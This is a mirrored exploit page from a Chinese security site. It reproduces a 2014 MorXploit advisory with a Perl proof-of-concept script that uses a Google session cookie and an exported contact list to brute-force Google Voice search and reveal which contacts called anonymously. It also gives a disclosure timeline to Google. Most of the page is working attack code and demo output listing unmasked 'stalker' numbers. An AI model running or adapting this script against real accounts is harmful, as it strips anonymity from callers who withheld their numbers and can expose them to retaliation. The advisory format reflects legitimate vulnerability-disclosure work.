首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Voice Private/Unknown Number Disclosure
来源:morxploit.com 作者:Youssef 发布时间:2014-04-08   
#!/usr/bin/perl
#
# Title: Google Voice private/unknown numbers disclosure
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: March 24 2014
# Reported: March 28 2014
# Published: April 04 2014
# MorXploit Research
# http://www.MorXploit.com
# Service: Google Voice
# Vendor: Google (http://www.google.com)
# Vulnerability: Information leak
# Vendor Status: Unfixed
# Original document: http://morxploit.com/morxploits/morxgooglevoice.pl
#
# About Google Voice:
# Google Voice gives you one number for all your phones -- a phone number that is tied to you, not to a device or a location.
# Use Google Voice to simplify the way you use phones, make using voicemail as easy as email, customize your callers' experience, and more.
# Google Voice isn't a phone service, but it lets you manage all of your phones. Google Voice works with mobile phones, desk phones,
# work phones, and VoIP lines. There's nothing to download, upload, or install, and you don't have to make or take calls using a computer.
# Google Voice will let you define which phones ring, based on who's calling, and even let you ListenInTM on voicemail before answering the
# call. We use smart technology to route your calls. So, if you're already on a Google Voice call, we'll recognize it and use call waiting to
# reach you on the phone you're on.
# Note: At this time Google Voice is only available in the U.S.
# More info at: https://support.google.com/voice/answer/115061?hl=en
#
# Description:
# We believe that's possible to identify a private/unknown number that has previously called a Google Voice number by simply logging to
# Google voice and sending a search query with the original number, Google voice will match the unknown number and returns call log confirming
# the original number match. This flaw could also be exploited by running a brute force attack against a private number through HTTP, however
# since the process could take an unrealistic amount of time, this could be very useful to determine how many people in your contact list have
# been calling you privately.
#
# Steps to reproduce the flaw manually:
#
# 1- Call your Google number privately.
# 2- Submit the original number in the Google Voice Search field.
# 3- The private number will show up in the search result as "Unknown".
# (See the following screenshot: http://www.morxploit.com/morxploits/pics/googlevoicess.png).
#
# PoC:
# Perl code to perform a Google contact list based brute force attack and determine how many (if any) numbers have called you anonymously.
# Running this script against my own contact list that consists of 160 phone numbers, I was able to disclose 4 private numbers, and the whole
# process took only a few seconds.
#
# PoC Usage:
# 1- Grab your contact list
# Navigate to https://www.google.com/contacts/u/1/
# Click on "More" And "Export" your contact list as vCard format (for importing into Apple Address Book or another application)
#
# 2- Log in to Google voice with your browser and copy your Google authentication cookie using the Chrome Developer tool or any
# other browser HTTP plugin, put it in a file and save it.
#
# Run the script as: perl morxgooglevoice.pl cookie.txt contacts.vcf
#
# Demo:
# root@MorXploit:/home/simo/morx/googlevoice# perl morxgooglevoice.pl cookie.txt contacts.vcf
# [+] Successfully logged in!
# [*] Verbose off!
# [*] Brute forcing ...
# [+] Your stalker number is: +1347XXXXXX
# [+] Hash: 82f9d27fb9c62b779a4ccXXXXXXXXXXXXXXXXXXX
# [+] Your stalker number is: +1860XXXXXX
# [+] Hash: bb92b43473434affe03bdXXXXXXXXXXXXXXXXXXX
# [+] Your stalker number is: +1407XXXXXX
# [+] Hash: 8f85b970bc8fa1a5f6697XXXXXXXXXXXXXXXXXXX
# [+] Your stalker number is: +1-347-XXX-XXXX
# [+] Hash: 82f9d27fb9c62b779a4ccXXXXXXXXXXXXXXXXXXX
# [+] Your stalker number is: +1-215-XXXX-XXXX
# [+] Hash: c12d7f163985979e34769XXXXXXXXXXXXXXXXXXX
# [-] All done
#
# Note: Contact numbers must be saved in the following format: +CountrycodeNumber (Exp: +11111111111) as this is the format that seem
# to work for all numbers.
#
# Disclosure timeline:
# March 24 2014: Discovery.
# March 28 2014: Initial report sent to security@google.com.
# March 28 2014: security@google.com bot responded and assigned case number.
# March 28 2014: Google Security Team responded saying they are looking into the issue.
# April 02 2014: Google Security Team confirmed the issue and said they are already aware of it, therefore our report doesn't qualify for a
# reward.
# April 04 2014: Public disclosure
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# PoC requirements:
# Requires LWP::UserAgent with SSL support
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay

use LWP::UserAgent;
use strict;

if (!defined ($ARGV[0] && $ARGV[1])) {
print "perl ___FCKpd___0 <cookie file> <numbers file> <verbose>\n";
print "perl ___FCKpd___0 cookie.txt contacts.csv verbose\n";
exit;
}

my $host = "https://www.google.com/voice/b/1/inbox/search";
my $cookiefile = $ARGV[0];
my $contactfile = $ARGV[1];
my $verbose = $ARGV[2];
open (CF, $cookiefile) || die "[-] Can't find/open $cookiefile\n";
open (LIST, $contactfile) || die "[-] Can't find/open $contactfile\n";
my $cookie = join("", <CF>);
close CF;

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);

my $gv = $ua->get("$host", 'Cookie' => "$cookie");

if ($gv->as_string =~ /<?xml/) {
print "[+] Successfully logged in!\n";
}
else {
print "[-] Couldn't log in\n";
exit;
}

if ($verbose eq "verbose") {
print "[*] Verbose on!\n";
}
else {
print "[*] Verbose off!\n";
}

print "[*] Brute forcing ...\n";

while (my $line = <LIST>) {
chomp ($line);
if ($line =~ /TEL;TYPE=(.*)/) {
my ($type, $number)= split(':',$line);
my $encoded = $number;
$encoded =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
$encoded =~ /(.*)%d/;
print "[*] Trying $number\n" if ($verbose eq "verbose");
my $gv = $ua->get("$host/?q=$1", 'Cookie' => "$cookie");
if ($gv->decoded_content =~ /Unknown.(.*?)"/) {
my $stalkerhash = $1;
print "[+] Your stalker number is: $number\n";
print "[+] Hash: $stalkerhash\n";
}
}
}
print "[-] All done\n";
close LIST;
exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MA Lighting Technology grandMA
·MacOSX 10.9.2/XNU HFS Hard Lin
·ibstat $PATH Privilege Escalat
·Fritz!Box Webcm Unauthenticate
·JIRA Issues Collector Director
·WinRAR Filename Spoofing
·Linksys E-Series TheMoon Remot
·BlazeDVD Pro Player 6.1 - Stac
·Kyocera FS5250 Cross Site Scri
·OpenSSL TLS Heartbeat Extensio
·Vtiger Install Unauthenticated
·PhonerLite 2.14 SIP Soft Phone
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved